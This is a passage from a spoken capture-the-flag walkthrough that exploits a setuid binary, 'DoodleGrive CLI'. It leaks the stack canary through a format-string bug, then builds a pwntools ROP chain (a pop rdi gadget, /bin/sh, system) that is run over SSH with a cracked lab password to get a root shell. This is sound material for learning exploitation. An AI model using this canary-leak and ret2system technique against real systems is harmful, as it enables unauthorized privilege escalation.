want. So here, let's just say line is equal to this. And I'm going to get everything but the last 2 bytes, because the last 2 bytes is going to be that null byte and then the colon. And let's see. We can probably do decode as well, because I want this in a string format. Maybe not. Oh, we're not printing. Print line. There we go. Awesome. And actually, I was going to just do a split, but we can also count how many characters this is. Echo WCC. That is 20. $19. I did not do a -n, so I added a line break in there. That's the correct number. So now if we run this again, we have a list of all the addresses. Now what we want to do is print this. So we'll do f string, I, and then we can do a tab, and then line. And we can probably say .decode to turn that into a string, so we get rid of all those B's. And if we just grep for anything that ends in a null byte, we can see a few potential canaries at 25, 23, 19, and 15. I'm going to guess it's 15 because this is the length of, this is 16 bytes or 8 bytes. I always get that mixed up, but this looks like it's the correct length. It's got a bunch of randomness. If I run it again, all these are always zeros. Those are not good canaries. This is. And since it's null byte terminated, we have a lot of null bytes here, so that also can't be a canary. So the canary is at position 15. So knowing that, let's play with this program real quick. So we explained we loaded the canary here so we can view it. We can also view it down here. So let's do GDB DoodleGrive. I'm going to break main. We're going to run. And let's step. This is us loading the canary. So if we look at RAX, we have the canary right here. Let's do V. I meant note, but that's going to be the canary. So I'm going to continue, and let's enter my username. So we're going to say, what is it? %15 long X. There we go. Enter password 4. This is looking good, right? So leaked 0x. That looks fine. We want to smash the stack, but before I do, let's break on this. And that's going to be 40, 23, 27. 0x 40, 23, 27. Continue. Let's smash the stack. Okay. So this is going to be what we inputted. So if we IRRCX, we're all A's. And if we look at this, this is going to be the canary. So we can say fs_base plus 0x28, there's a canary. So that XOR is not going to equal 0, so we fail the stack check, right? But now, since we can leak the canary and that enter password for whatever thing, we can now smash the stack, or we can put the canary where it needs to be. What we have to do is figure out exactly where that is. So I'm going to say pattern create 100 to create this string. Whoops, let's just copy. And then we will rerun the program. We can continue. Enter username, we don't care here. Enter password, right there. And now we have overflowed the stack, and this is going to be where a canary is in RCX. But since we have a pattern string, we can just do pattern offset this. And we see after 56 bytes, we hit our thing. If you wanted to, instead of doing info register, you could do print RCX, and that stores it as $1. So you could do pattern offset like this and get the same thing. So we know after 56, that's when we hit this. So what we want to do is create a script. We already proved that. We don't need it. It changes every time, so it doesn't really help us. We can do Python 3-c print a times 56 plus b times 4. Like that, plus c times 8. And I should have done times 8 here because we're 64-bit. Okay, so I'm going to put this in, and what I want to see is, where's my break? Hold on, let me break again. What I want to see is all 42s on my canary, because 41s would be A, 42 is B, 43 is C. If I see anything other than 42, we have something wrong. So we set the breakpoint, we can run it, we can enter the username, that doesn't matter. Put this, and then print RCX, and we see all 42s. So now we can predict the canary. So let's start creating our script. Okay, v exploit.py. And let's do from pwn import star. E is equal to elf doodle grive CLI. And then I'm going to set my terminal to be tmux. So this will enable us to debug easily. So we want to split the window horizontal on the current pane. I think that's right. Let's do IO is equal to GDB debug. Let's do DoodleGrive CLI. Okay. So we want to receive the line twice. Then we want to send it. So we'll say IO send line. We want to say %15 long X, like that. Okay. And now let's grab how we have this. So I can call this leak is equal to that. Then the canary, we want to make that into hex. And let's do log info canary. And then we can say hex canary. Like that. Make that an F string. And I'll just say IO interactive. And let's see if it works. So we run it, GDB's up, and we have the canary there. Awesome. So let's exit this. And let's see. We actually want to send this now. So we're going to say payload is equal to A times 56, because that gets us to where we overwrite. Now we can say payload plus equals the canary. And then payload plus equals, we'll say C times 16. And now I can say io.send line payload. We run this. I'm going to set the breakpoint for the canary check. Then we're going to continue. Can't concat int to bytes. P64. Okay, so we sent this canary supposedly. We're in where we have been every time we broke for the canary. So I can say print RCX, and that is what we thought. It begins with 49, ends in a null byte. So we sent that canary. Now the question is, does it match FS, or the actual canary? So let's do a x/g fs base 0x28. It does. So if we continue, we hit this, we crash because a return goes nowhere, right? That should be all C's. The RSP, the stack pointer, this is where we attempted to return to, and no go, right? So we have to start building our payload now. So let's see, if I look at exploit, we have that. This is where we're going to use wrapper. Whoops, wrapper-h. And I'm going to look for the string bin.sh. With specify file. Was it DoodleGrive? There we go. So bin.sh is here. So we can go v exploit. Let's put everything here. So bin.sh is equal to p64. That. System should be in this program because we have been calling system. That will just be system is equal to elf sim system. Let's do log info. bin.sh string at bin.sh. And this will be system address at system. Pwnlib elf, because I called it E. Yep. So we have the addresses there. We have not converted them correctly. Let's see. Could I just P64 this? Is that going to work? A required argument. Oh, because the memory addresses. I already did P64 there. So let's just add a .hex, and that should fix it. Let's see. bin.sh fixed. System address did not. Int object has no attribute hex. What was system printing as? Is that fine already? Line 11. Oh, because we don't have a and parenthesis. Okay. That is good. I guess we could do B64 there. There. So we have everything. I think this formatting is wrong there, but I don't think that will matter. I think that's just for the printing thing. So that looks good. Okay, so in order to do this, we need a pop RDI. So we can say wrapper. Let's go back to the command. Search for gadget. Pop RDI return. How do we search gadgets? Search. There we go. We have this. Okay. So we should have the pieces to the payload. So we can say payload plus equals pop RDI return. Payload plus equals binsh. Payload plus equals system. Okay. Let us run our exploit. And we failed. Not exactly sure where we failed. Let's run this again. And we're going to set a breakpoint on the return because this is where we should overwrite. So 40, 23, 38. 0x 40, 23, 38. Run. Oh, shoot. Continue. Okay, this is where we are. And if I look at this, RSP is binsh. Should it be pop RDI first? Oh, we're right here, RBP. So we step. What's the code look like? We do the Canary. Then we do pop RDI, but I swear that did not happen. Let's go back to our break. Oh, I know what's happening. We assume we have write access right after the Canary, but we have the base pointer right here. So we have to skip over this because the first instruction is going to be the stack pointer. So we just forgot to put a little bit of junk in our payload. So our pop RDI never actually executed. So after we send the Canary, we do payload plus equals. We just send a junk. We'll say this is RBP. Do gets us to Canary. Leaked from username printf. RBP first gadget of our chain. There we go. That makes more sense. And we are erroring here. So I'm going to go on the return again. Our payload is not done yet, but I do want to show what just happened. So now we have the return. If I look at RSP, RSP is pop RDI. So what we're doing here is we're loading bin sh right here. So if I do si, we look at it. I think the next time we step, yeah, we have RDI now pointed to bin sh. So when we call the system command, it's going to pull the first argument, which is RDI, and it's going to run system bin sh, right? So now we're in system bin sh, and then it errors still. I don't know exactly where, how far down the stack. If I just do continue, we hit it. So this is where it's erroring, I think, the move APS. And our stack is not properly aligned. Move APS, I want to say, wants 16 bytes, and we only have 8, I believe. So we're just going to put a return beforehand, and that should align our stack. So let's go back to wrapper, and let's just find if there's a return, which there's pop RDI, so there definitely is just return. We can probably use this one, return 0. Let's try this. And let's see, we'll put it. We don't have any crashes. If I do ls, we get not found, but bin ls, it is. We just don't have anything set in our path. So we now have a working exploit. So what we want to do is run this on the target. So in order to do that, trying to think the best way, I guess we have to SSH and execute, right? Because I don't think our target, wherever that is, there we go, has pwntools, right? Python 3, import pwn. Yeah. Import pwntools, is it? Yeah, we don't have pwntools here. So in our script, we should be able to replace what we call GDB and have that be an SSH client. So we can say SSH con is equal to SSH. Host is equal to, was it 10, 10, 11, 235? Is that it? It is. Then we'll say user is equal to, I forgot all the credentials. What is Tom's password? Let's see. Tom, password is equal to, we got that from the Kraken. John Mayer 7. Okay. Then we can say IO is equal to sshcon.process. and DoodleGrive CLI. Python 3, exploit. We connected. It's not doing anything. Not executable, it doesn't exist. Oh, there's a dash. There we go. Try this now. It connects. It's going to log in. And here we go. If I do bin ID, we are now root, right? So I do bin ls on/root. We can get root.txt. So that is doing it through the buffer overflow. And we'll conclude the video. Hope you guys enjoyed it. Take care, and I will see you all next time.